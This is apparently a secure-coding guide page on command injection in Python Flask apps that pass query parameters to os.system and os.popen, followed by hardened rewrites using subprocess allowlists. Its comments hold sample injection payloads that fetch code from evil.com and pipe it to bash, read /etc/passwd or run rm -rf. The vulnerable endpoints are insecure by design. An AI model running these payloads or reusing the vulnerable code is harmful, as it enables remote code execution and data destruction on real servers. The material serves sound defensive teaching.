Command injection from user input in os.system/os.popen calls

Critical Risk command-injection
python · command-injection · os-system · os-popen · shell · rce

What it is

A critical security vulnerability where user-controlled strings are passed to os.system/os.popen, invoking a shell where metacharacters enable arbitrary command execution. Command injection can execute arbitrary OS commands, read or modify data, and fully compromise the server.

import os
import sys
from flask import Flask, request, jsonify

app = Flask(__name__)

# VULNERABLE: Flask app with os.system injection
@app.route('/system-info')
def system_info():
    """Run a host diagnostic command chosen by the ``type`` query parameter.

    Deliberately vulnerable example: the ``path`` and ``pattern`` query
    parameters are interpolated into the string handed to ``os.system``
    without any validation or quoting.

    The command output is not captured; every request receives the same fixed
    response string, including requests whose ``type`` matches no branch.
    """
    info_type = request.args.get('type', 'uptime')
    
    # VULNERABLE: User input in os.system
    if info_type == 'uptime':
        # Fixed command string: no request data reaches this call.
        os.system('uptime')
    elif info_type == 'disk':
        path = request.args.get('path', '/')
        # DANGEROUS: Path parameter in command
        os.system(f'df -h {path}')
    elif info_type == 'process':
        pattern = request.args.get('pattern', '')
        # DANGEROUS: Search pattern in command
        os.system(f'ps aux | grep {pattern}')
    
    return 'System command executed'

@app.route('/file-ops')
def file_operations():
    """Perform the file action named by the ``op`` query parameter.

    Deliberately vulnerable example: ``file``, ``pattern`` and ``dest`` are
    read from the query string and formatted directly into command strings
    passed to ``os.popen`` / ``os.system``.

    Returns the command output for ``view`` and ``search``, a status line
    containing the ``os.system`` result for ``backup``, and
    ``'Invalid operation'`` for any other ``op`` value.
    """
    operation = request.args.get('op', '')
    filename = request.args.get('file', '')
    
    if operation == 'view':
        # VULNERABLE: os.popen with user input
        with os.popen(f'cat {filename}') as proc:
            content = proc.read()
        return content
    
    elif operation == 'search':
        pattern = request.args.get('pattern', '')
        # DANGEROUS: Multiple user inputs
        # The double quotes around the pattern are part of the command string
        # only; the pattern itself is inserted unmodified.
        with os.popen(f'grep "{pattern}" {filename}') as proc:
            results = proc.read()
        return results
    
    elif operation == 'backup':
        dest = request.args.get('dest', '/backup/')
        # VULNERABLE: Command construction
        command = f'cp {filename} {dest}'
        exit_code = os.system(command)
        return f'Backup completed with exit code: {exit_code}'
    
    return 'Invalid operation'

@app.route('/admin-tools')
def admin_tools():
    """Run a command assembled entirely from query parameters.

    Deliberately vulnerable example: ``tool``, ``options`` and ``target`` are
    joined with spaces and the resulting string is passed to ``os.popen``.

    Returns JSON with the command output under ``result``, or the exception
    text under ``error`` if anything raises.
    """
    tool = request.args.get('tool', '')
    target = request.args.get('target', '')
    options = request.args.get('options', '')
    
    # VULNERABLE: Complete user control over command
    command = f'{tool} {options} {target}'
    
    try:
        # The object returned by os.popen is read but never explicitly closed.
        result = os.popen(command).read()
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

# Script entry point: start the Flask server with debug mode enabled.
# NOTE(review): debug mode is presumably meant for this local demo only — confirm before reuse.
if __name__ == '__main__':
    app.run(debug=True)

# Attack examples:
# GET /system-info?type=disk&path=/; rm -rf /var/www; echo
# GET /file-ops?op=view&file=/etc/passwd; wget evil.com/steal
# GET /file-ops?op=search&pattern=test" /etc/passwd; curl evil.com/data
# GET /admin-tools?tool=sh&options=-c&target="curl evil.com/backdoor | bash"
import subprocess
import hashlib
import os
from pathlib import Path
from typing import Dict, List, Any, Optional
from flask import Flask, request, jsonify
import logging

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

app = Flask(__name__)

class SecureSystemOperations:
    """Run a fixed allowlist of system and file operations without a shell.

    System-information requests map to hard-coded argument lists. File
    operations only touch regular files that resolve to a location inside one
    of ``SAFE_DIRECTORIES``.
    """

    # Allowlist of operations. ``system_info`` entries carry the exact argv to
    # run; ``file_ops`` entries say whether the work is done in Python
    # ('native') or by an external command ('subprocess').
    ALLOWED_OPERATIONS = {
        'system_info': {
            'uptime': {'command': ['uptime'], 'args': []},
            'disk_usage': {'command': ['df', '-h'], 'args': []},
            'memory': {'command': ['free', '-h'], 'args': []}
        },
        'file_ops': {
            'info': {'method': 'native'},
            'hash': {'method': 'native'},
            'count': {'method': 'subprocess', 'command': ['wc', '-l']}
        }
    }

    # Only files that resolve inside one of these directories are processed.
    SAFE_DIRECTORIES = [
        Path('/secure/uploads').resolve(),
        Path('/secure/documents').resolve()
    ]

    def __init__(self):
        """Create the safe directories if they do not exist yet."""
        for directory in self.SAFE_DIRECTORIES:
            directory.mkdir(parents=True, exist_ok=True)

    def get_system_info(self, info_type: str) -> Dict[str, Any]:
        """Run the allowlisted system-information command for ``info_type``.

        Args:
            info_type: A key of ``ALLOWED_OPERATIONS['system_info']``.

        Returns:
            A dict with ``success`` (exit status was 0), ``output`` (stdout)
            and ``error`` (stderr).

        Raises:
            ValueError: ``info_type`` is not allowlisted.
            RuntimeError: The command did not finish within 10 seconds.
        """
        if info_type not in self.ALLOWED_OPERATIONS['system_info']:
            raise ValueError(f'Info type not allowed: {info_type}')

        config = self.ALLOWED_OPERATIONS['system_info'][info_type]

        try:
            # SECURE: fixed argument list, no shell, no request data in argv.
            result = subprocess.run(
                config['command'],
                capture_output=True,
                text=True,
                timeout=10
            )
        except subprocess.TimeoutExpired as exc:
            raise RuntimeError('Command timeout') from exc

        return {
            'success': result.returncode == 0,
            'output': result.stdout,
            'error': result.stderr
        }

    def process_file(self, operation: str, filename: str) -> Dict[str, Any]:
        """Validate ``filename`` and apply the allowlisted ``operation`` to it.

        Args:
            operation: A key of ``ALLOWED_OPERATIONS['file_ops']``.
            filename: Bare file name, looked up in ``SAFE_DIRECTORIES``.

        Returns:
            The result dict of the native or subprocess handler.

        Raises:
            ValueError: Unknown operation, unknown method, or bad file name.
            FileNotFoundError: No matching file inside a safe directory.
        """
        if operation not in self.ALLOWED_OPERATIONS['file_ops']:
            raise ValueError(f'File operation not allowed: {operation}')

        # Validate and resolve the path before any handler sees it.
        file_path = self._validate_file_path(filename)

        config = self.ALLOWED_OPERATIONS['file_ops'][operation]
        method = config['method']

        if method == 'native':
            return self._native_file_operation(operation, file_path)
        if method == 'subprocess':
            return self._subprocess_file_operation(config['command'], file_path)
        raise ValueError('Unknown operation method')

    def _validate_file_path(self, filename: str) -> Path:
        """Return the resolved path of ``filename`` inside a safe directory.

        Raises:
            ValueError: The name has characters outside ``[a-zA-Z0-9._-]`` or
                is longer than 255 characters.
            FileNotFoundError: No safe directory contains such a regular file.
        """
        import re

        # fullmatch, not match + '$': '$' also matches just before a trailing
        # newline, which would let 'name\n' through.
        if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
            raise ValueError('Invalid filename format')

        if len(filename) > 255:
            raise ValueError('Filename too long')

        for safe_dir in self.SAFE_DIRECTORIES:
            root = safe_dir.resolve()
            candidate_path = (root / filename).resolve()

            # Compare path components, not string prefixes: a symlink that
            # resolves into a sibling such as '/secure/uploads_evil' shares
            # the string prefix '/secure/uploads' but is outside the root.
            if root in candidate_path.parents and candidate_path.is_file():
                return candidate_path

        raise FileNotFoundError('File not found in safe directories')

    def _native_file_operation(self, operation: str, file_path: Path) -> Dict[str, Any]:
        """Perform ``info`` or ``hash`` on ``file_path`` using Python only.

        Raises:
            ValueError: ``operation`` is neither ``'info'`` nor ``'hash'``.
        """
        if operation == 'info':
            st = file_path.stat()
            return {
                'operation': 'info',
                'filename': file_path.name,
                'size': st.st_size,
                'modified': st.st_mtime,
                # Last three octal digits of the mode: user/group/other bits.
                'permissions': oct(st.st_mode)[-3:],
                'is_readable': os.access(file_path, os.R_OK)
            }

        if operation == 'hash':
            hasher = hashlib.sha256()
            # Hash in 4 KiB chunks so the whole file is never held in memory.
            with open(file_path, 'rb') as f:
                for chunk in iter(lambda: f.read(4096), b''):
                    hasher.update(chunk)

            return {
                'operation': 'hash',
                'filename': file_path.name,
                'sha256': hasher.hexdigest(),
                'size': file_path.stat().st_size
            }

        raise ValueError(f'Unknown native operation: {operation}')

    def _subprocess_file_operation(self, command: List[str],
                                  file_path: Path) -> Dict[str, Any]:
        """Run ``command`` with ``file_path`` appended as the last argument.

        Args:
            command: Allowlisted argv prefix, e.g. ``['wc', '-l']``.
            file_path: Already-validated absolute path.

        Returns:
            A dict describing the command, its exit status and its output.

        Raises:
            RuntimeError: The command did not finish within 30 seconds.
        """
        full_command = command + [str(file_path)]

        try:
            # SECURE: argument list, no shell; the path is a single argv item.
            result = subprocess.run(
                full_command,
                capture_output=True,
                text=True,
                timeout=30,
                cwd=str(file_path.parent)
            )
        except subprocess.TimeoutExpired as exc:
            raise RuntimeError('Command execution timeout') from exc

        return {
            'operation': 'subprocess',
            'command': ' '.join(command),
            'filename': file_path.name,
            'success': result.returncode == 0,
            'output': result.stdout.strip(),
            'error': result.stderr.strip()
        }

# Initialize secure operations
secure_ops = SecureSystemOperations()

# SECURE: Flask endpoints with validation
@app.route('/system-info')
def system_info():
    """Return the output of the allowlisted command named by ``type``.

    Responds 400 when ``type`` is missing or not allowlisted, and 500 with a
    generic message (details are logged) for any other failure.
    """
    try:
        requested = request.args.get('type', '').strip()

        if requested:
            return jsonify(secure_ops.get_system_info(requested))

        return jsonify({'error': 'Info type required'}), 400

    except ValueError as exc:
        # Raised by get_system_info for a type outside the allowlist.
        return jsonify({'error': str(exc)}), 400
    except Exception as exc:
        logger.error(f'System info error: {exc}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/file-info/<filename>')
def file_info(filename):
    """Return metadata for ``filename`` as JSON.

    Responds 400 for a rejected name, 404 when the file is not found, and
    500 with a generic message (details are logged) otherwise.
    """
    try:
        return jsonify(secure_ops.process_file('info', filename))

    except ValueError as exc:
        return jsonify({'error': str(exc)}), 400
    except FileNotFoundError as exc:
        return jsonify({'error': str(exc)}), 404
    except Exception as exc:
        logger.error(f'File info error: {exc}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/file-hash/<filename>')
def file_hash(filename):
    """Return the hash result for ``filename`` as JSON.

    Responds 400 for a rejected name, 404 when the file is not found, and
    500 with a generic message (details are logged) otherwise.
    """
    try:
        return jsonify(secure_ops.process_file('hash', filename))

    except ValueError as exc:
        return jsonify({'error': str(exc)}), 400
    except FileNotFoundError as exc:
        return jsonify({'error': str(exc)}), 404
    except Exception as exc:
        logger.error(f'File hash error: {exc}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/operations')
def list_operations():
    """Describe the allowlisted operations and the safe directories as JSON."""
    allowed = secure_ops.ALLOWED_OPERATIONS
    directories = [str(directory) for directory in secure_ops.SAFE_DIRECTORIES]

    payload = {
        'system_info_types': list(allowed['system_info']),
        'file_operations': list(allowed['file_ops']),
        'safe_directories': directories
    }
    return jsonify(payload)

@app.errorhandler(404)
def not_found(error):
    """Answer 404 errors with a JSON body instead of the default page."""
    body = jsonify({'error': 'Endpoint not found'})
    return body, 404

@app.errorhandler(500)
def internal_error(error):
    """Answer 500 errors with a generic JSON body."""
    body = jsonify({'error': 'Internal server error'})
    return body, 500

# Script entry point: serve on the loopback interface, port 5000, with debug mode off.
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=False)

💡 Why This Fix Works

The vulnerable code uses os.system() and os.popen() with user input, allowing command injection through shell metacharacters. The secure version eliminates shell command usage, implements strict operation allowlisting, uses subprocess with argument lists, and leverages native Python operations for file handling.

Why it happens

Directly passing user input to os.system() enables shell command injection. The os.system() function executes commands through the system shell, interpreting metacharacters and allowing command chaining.

Root causes

User Input in os.system() Calls

Directly passing user input to os.system() enables shell command injection. The os.system() function executes commands through the system shell, interpreting metacharacters and allowing command chaining.

Preview example – PYTHON
import os
from flask import request

# VULNERABLE: User input in os.system()
@app.route('/execute')
def execute_command():
    """Pass the ``cmd`` query parameter to ``os.system`` unchanged.

    Deliberately vulnerable example. The response reports the value returned
    by ``os.system``; the command's own output is not captured.
    """
    cmd = request.args.get('cmd', '')
    
    # DANGEROUS: Direct shell execution
    exit_code = os.system(cmd)
    
    return f'Command executed with exit code: {exit_code}'

# Attack: GET /execute?cmd=cat /etc/passwd; wget evil.com/steal

String Formatting in os.popen()

Using string formatting or concatenation to build commands for os.popen() with user input. This allows attackers to inject additional commands or modify the intended command behavior.

Preview example – PYTHON
import os

# VULNERABLE: String formatting in os.popen()
def get_file_info(filename):
    """Return the output of ``ls -la`` for ``filename``.

    Deliberately vulnerable example: ``filename`` is formatted into the
    command string without validation or quoting.
    """
    # DANGEROUS: User input in formatted command
    command = f'ls -la {filename}'
    
    with os.popen(command) as proc:
        return proc.read()

# Attack: get_file_info('/etc/passwd; rm -rf /; echo')

Fixes

1

Replace os.system with subprocess

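Use subprocess.run() with argument lists instead of os.system(). This avoids shell interpretation, so shell metacharacters in user input can no longer chain or substitute commands. An argument list does not stop option injection, however: a user-supplied value that begins with "-" is still parsed by the target program as an option, so place "--" before user-supplied operands or reject such values.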

View implementation – PYTHON
import subprocess
from pathlib import Path

# SECURE: subprocess instead of os.system
def execute_safe_command(operation, filename):
    """Run an allowlisted read-only command against ``filename``.

    Args:
        operation: One of ``'count'``, ``'info'`` or ``'checksum'``.
        filename: Bare file name; must satisfy ``is_valid_filename``.

    Returns:
        The command's standard output as text.

    Raises:
        ValueError: ``operation`` is not allowlisted or ``filename`` is
            rejected by ``is_valid_filename``.
        RuntimeError: The command exited with a non-zero status.
    """
    # Validate operation
    allowed_ops = {'count': ['wc', '-l'], 'info': ['file'], 'checksum': ['sha256sum']}
    if operation not in allowed_ops:
        raise ValueError('Operation not allowed')

    # Validate filename
    if not is_valid_filename(filename):
        raise ValueError('Invalid filename')

    # '--' ends option parsing, so a valid name that starts with '-'
    # (e.g. '-data.txt') is treated as a file operand, not as options.
    command = allowed_ops[operation] + ['--', filename]

    # SECURE: No shell interpretation
    result = subprocess.run(
        command,
        capture_output=True,
        text=True,
        timeout=30
    )

    if result.returncode != 0:
        raise RuntimeError(f'Command failed: {result.stderr}')

    return result.stdout


def is_valid_filename(filename):
    """Return True if ``filename`` is a plain name that is safe to pass on.

    A valid name is a string of 1-255 characters drawn from
    ``[a-zA-Z0-9._-]`` that does not contain ``'..'``.
    """
    import re

    if not isinstance(filename, str):
        return False

    # fullmatch, not match + '$': '$' also matches just before a trailing
    # newline, which would accept 'name\n'.
    return (bool(re.fullmatch(r'[a-zA-Z0-9._-]+', filename)) and
            len(filename) <= 255 and
            '..' not in filename)
2

Use Native Python Alternatives

Replace shell commands with native Python functions whenever possible. Use pathlib, built-in file operations, and specialized libraries instead of external commands.

View implementation – PYTHON
import os
import hashlib
from pathlib import Path
from typing import Dict, Any

# SECURE: Native Python operations
class NativeFileOperations:
    """File metadata, checksum and line count using only Python APIs.

    Every public method resolves its ``filename`` against ``safe_dir`` and
    refuses paths that end up outside that directory.
    """

    def __init__(self, safe_directory: str):
        """Remember the resolved form of ``safe_directory`` as the root."""
        self.safe_dir = Path(safe_directory).resolve()

    def get_file_info(self, filename: str) -> Dict[str, Any]:
        """Return name, size, mtime, permission digits and access flags."""
        file_path = self._validate_path(filename)
        st = file_path.stat()

        return {
            'name': file_path.name,
            'size': st.st_size,
            'modified': st.st_mtime,
            # Last three octal digits of the mode: user/group/other bits.
            'permissions': oct(st.st_mode)[-3:],
            'is_file': file_path.is_file(),
            'is_readable': os.access(file_path, os.R_OK)
        }

    def calculate_checksum(self, filename: str) -> str:
        """Return the SHA-256 hex digest of the file's contents."""
        file_path = self._validate_path(filename)

        hasher = hashlib.sha256()
        # Hash in 4 KiB chunks so the whole file is never held in memory.
        with open(file_path, 'rb') as f:
            for chunk in iter(lambda: f.read(4096), b''):
                hasher.update(chunk)

        return hasher.hexdigest()

    def count_lines(self, filename: str) -> int:
        """Return the number of lines in the file, read as UTF-8 text."""
        file_path = self._validate_path(filename)

        with open(file_path, 'r', encoding='utf-8') as f:
            return sum(1 for _ in f)

    def _validate_path(self, filename: str) -> Path:
        """Resolve ``filename`` under ``safe_dir`` and return the path.

        Raises:
            ValueError: ``filename`` is empty, longer than 255 characters, or
                resolves to a location outside ``safe_dir``.
            FileNotFoundError: The resolved path does not exist.
        """
        # Input validation
        if not filename or len(filename) > 255:
            raise ValueError('Invalid filename')

        # Resolve '..' components and symlinks before checking containment.
        file_path = (self.safe_dir / filename).resolve()

        # Compare path components, not string prefixes: '/data/safe_evil/x'
        # starts with the string '/data/safe' but is not inside '/data/safe'.
        try:
            file_path.relative_to(self.safe_dir)
        except ValueError:
            raise ValueError('Path outside safe directory') from None

        if not file_path.exists():
            raise FileNotFoundError(f'File not found: {filename}')

        return file_path
3

Implement Command Allowlisting

If system commands are necessary, create strict allowlists of permitted commands and use subprocess with proper validation and escaping.

View implementation – PYTHON
import subprocess
import shlex
from typing import List, Dict, Any

class SecureCommandRunner:
    """Run a small allowlist of commands with validated options and target.

    Commands run without a shell, with ``/safe/workspace`` as the working
    directory. Targets must be relative paths so they stay under it.
    """

    # For each command name: the fixed argv prefix, the maximum number of
    # extra options a caller may add, and which options are permitted.
    ALLOWED_COMMANDS = {
        'list_files': {
            'command': ['ls', '-la'],
            'max_args': 1,
            'allowed_args': ['-h', '-t', '-r']
        },
        'file_type': {
            'command': ['file'],
            'max_args': 1,
            'allowed_args': []
        },
        'word_count': {
            'command': ['wc'],
            'max_args': 1,
            'allowed_args': ['-l', '-w', '-c']
        }
    }

    def execute_command(self, cmd_name: str, target: str,
                       args: List[str] = None) -> Dict[str, Any]:
        """Run the allowlisted command ``cmd_name`` against ``target``.

        Args:
            cmd_name: A key of ``ALLOWED_COMMANDS``.
            target: Relative path the command operates on.
            args: Optional extra options; each must be allowlisted for the
                command. ``None`` means no extra options.

        Returns:
            A dict with ``success``, ``output``, ``error`` and the executed
            ``command`` joined with spaces.

        Raises:
            ValueError: Unknown command, disallowed option, or bad target.
            RuntimeError: The command did not finish within 30 seconds.
        """
        # Validate command
        if cmd_name not in self.ALLOWED_COMMANDS:
            raise ValueError(f'Command not allowed: {cmd_name}')

        cmd_config = self.ALLOWED_COMMANDS[cmd_name]

        # Validate arguments
        validated_args = self._validate_args(args or [], cmd_config)

        # Validate target
        safe_target = self._validate_target(target)

        command = self._build_command(cmd_config, validated_args, safe_target)

        # Execute safely: argument list, no shell.
        try:
            result = subprocess.run(
                command,
                capture_output=True,
                text=True,
                timeout=30,
                cwd='/safe/workspace'
            )
        except subprocess.TimeoutExpired as exc:
            raise RuntimeError('Command timeout') from exc

        return {
            'success': result.returncode == 0,
            'output': result.stdout,
            'error': result.stderr,
            'command': ' '.join(command)
        }

    def _build_command(self, config: Dict, args: List[str],
                       target: str) -> List[str]:
        """Assemble the argv: fixed prefix, options, ``--``, then the target."""
        # '--' ends option parsing, so a target that starts with '-' is
        # treated as a path operand rather than as another option.
        return config['command'] + list(args) + ['--', target]

    def _validate_args(self, args: List[str], config: Dict) -> List[str]:
        """Return ``args`` unchanged if every item is permitted by ``config``.

        Raises:
            ValueError: Too many options, or an option outside the allowlist.
        """
        if len(args) > config['max_args']:
            raise ValueError('Too many arguments')

        allowed_args = config['allowed_args']
        for arg in args:
            if arg not in allowed_args:
                raise ValueError(f'Argument not allowed: {arg}')

        return args

    def _validate_target(self, target: str) -> str:
        """Return ``target`` unchanged if it is a safe relative path.

        Raises:
            ValueError: The target has characters outside
                ``[a-zA-Z0-9._/-]``, is an absolute path, or contains ``..``.
        """
        import re

        # fullmatch, not match + '$': '$' also matches just before a trailing
        # newline, which would accept 'name\n'.
        if not re.fullmatch(r'[a-zA-Z0-9._/-]+', target):
            raise ValueError('Invalid target format')

        # An absolute path ignores the working directory entirely, so it
        # would reach files outside the workspace (e.g. '/etc/passwd').
        if target.startswith('/'):
            raise ValueError('Absolute paths not allowed')

        if '..' in target:
            raise ValueError('Directory traversal not allowed')

        return target

Detect This Vulnerability in Your Code

Sourcery automatically identifies command injection from user input in os.system/os.popen calls and many other security issues in your codebase.